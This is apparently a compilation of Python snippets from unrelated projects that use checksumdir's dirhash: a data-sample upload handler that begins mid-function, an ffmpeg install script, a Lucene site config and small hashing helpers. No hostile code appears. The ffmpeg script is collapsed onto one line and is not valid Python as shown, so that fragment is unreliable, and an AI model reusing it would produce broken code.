                    f'Archives {file} and {pkhash_map[pkhash]} are the same')

            data[pkhash] = {
                'pkhash': pkhash,
                'path': datasamples_path_from_file
            }

    else:
        # files must be available on local filesystem
        path = request.POST.get('path')
        paths = request.POST.getlist('paths')
        if path and paths:
            raise Exception('Cannot use path and paths together.')
        if path is not None:
            paths = [path]

        recursive_dir_field = BooleanField()
        recursive_dir = recursive_dir_field.to_internal_value(
            request.data.get('multiple', 'false'))
        if recursive_dir:
            # list all directories from parent directories
            parent_paths = paths
            paths = []
            for parent_path in parent_paths:
                subdirs = next(os.walk(parent_path))[1]
                subdirs = [os.path.join(parent_path, s) for s in subdirs]
                if not subdirs:
                    raise Exception(
                        f'No data sample directories in folder {parent_path}')
                paths.extend(subdirs)

        # paths should be directories
        for path in paths:
            if not os.path.isdir(path):
                raise Exception(
                    f'One of your paths does not exist, '
                    f'is not a directory or is not an absolute path: {path}')
            pkhash = dirhash(path, 'sha256')
            try:
                data[pkhash]
            except KeyError:
                pass
            else:
                # existing can be a dict with a field path or file
                raise Exception(
                    f'Your data sample directories contain same files leading to same pkhash. '
                    f'Invalid path: {path}.')

            data[pkhash] = {'pkhash': pkhash, 'path': normpath(path)}

    if not data:
        raise Exception('No data sample provided.')

    return list(data.values())

def checksum(path):
    """Directory sha1 checksum"""
    return checksumdir.dirhash(path, 'sha1')

def calculate_custom_check_bins_hash(custom_check_bins_provided, custom_check_bins_dir):
    if custom_check_bins_provided == 'true':
        return checksumdir.dirhash(custom_check_bins_dir, 'sha1')
    return ''

install("checksumdir") install("psutil") install("pydub") install("matplotlib") install("data/opencv_python-3.3.1-cp36-cp36m-win_amd64.whl") import checksumdir #Download ffmpeg if (os.path.isdir('../src/lib/ffmpeg_x64/') and checksumdir.dirhash('../src/lib/ffmpeg_x64') == 'c6f76a82e889404a156b7ac93e367524'): print("ffmpeg_x64 already existing") else: if (os.path.isdir('../src/lib/ffmpeg_x64/')): print('removing corrupt ffmpeg installation') shutil.rmtree('../src/lib/ffmpeg_x64/') print('reinstalling ffmpeg') print("Unzipping directory...") unzip("data/ffmpeg_x64.zip", "data/ffmpeg_x64") print("Unzipping finished") print("Copying extracted files") shutil.copytree('data/ffmpeg_x64/ffmpeg-20171203-5a93a85-win64-static', '../src/lib/ffmpeg_x64')
from checksumdir import dirhash

if __name__ == '__main__':
    line = "hash(./test) = <{}>".format(dirhash('test', 'sha1'))
    print(line)

def _get_dirhash(absolute_dirpath):
    return checksumdir.dirhash(absolute_dirpath)

from datetime import datetime, date
from checksumdir import dirhash

AUTHOR = 'Lucene and Solr Developers'
SITENAME = 'Apache Lucene'
SITESUBTITLE = ''
SITEURL = ''
CURRENTYEAR = date.today().year

LUCENE_LATEST_RELEASE = '8.7.0'
LUCENE_LATEST_RELEASE_DATE = datetime(2020, 11, 3)
LUCENE_PREVIOUS_MAJOR_RELEASE = '7.7.3'

# This string will be appended to all unversioned css and js resources to prevent caching surprises on edits.
# The theme's htaccess file also sets a cache-control header with longer lifetime, if the v=XXXX query string is added.
STATIC_RESOURCE_SUFFIX = "?v=%s" % dirhash('themes/lucene/static', 'sha1')[-8:]

PATH = 'content'
THEME = 'themes/lucene'
TIMEZONE = 'UTC'
DEFAULT_LANG = 'en'
DEFAULT_DATE_FORMAT = '%-d %B %Y'
DATE_FORMATS = {
    'en': '%-d %B %Y',
}
USE_FOLDER_AS_CATEGORY = False

def _get_hashtag(file_path):
    '''Get sha256 of given directory or file'''
    if os.path.isdir(file_path):
        return dirhash(file_path, 'sha256')
    else:
        return _get_file_sha256(file_path)

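# Hedged usage sketch (not from the original source): _get_hashtag() dispatches on the path
# type, so the same call covers files and directories. The paths are hypothetical and
# _get_file_sha256 is assumed to be defined elsewhere in the module.
print(_get_hashtag('build/'))          # directory -> checksumdir.dirhash(..., 'sha256')
print(_get_hashtag('build/app.tar'))   # file -> _get_file_sha256(...)
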
def write_md5_of_dump(group_dump_path, configs_file_path):
    global DUMP_PATH
    from checksumdir import dirhash

    md5hash = dirhash(group_dump_path, 'md5')
    with open(configs_file_path, 'a+') as configs_file_out:
        configs_file_out.write("\nMD5='" + str(md5hash) + "'")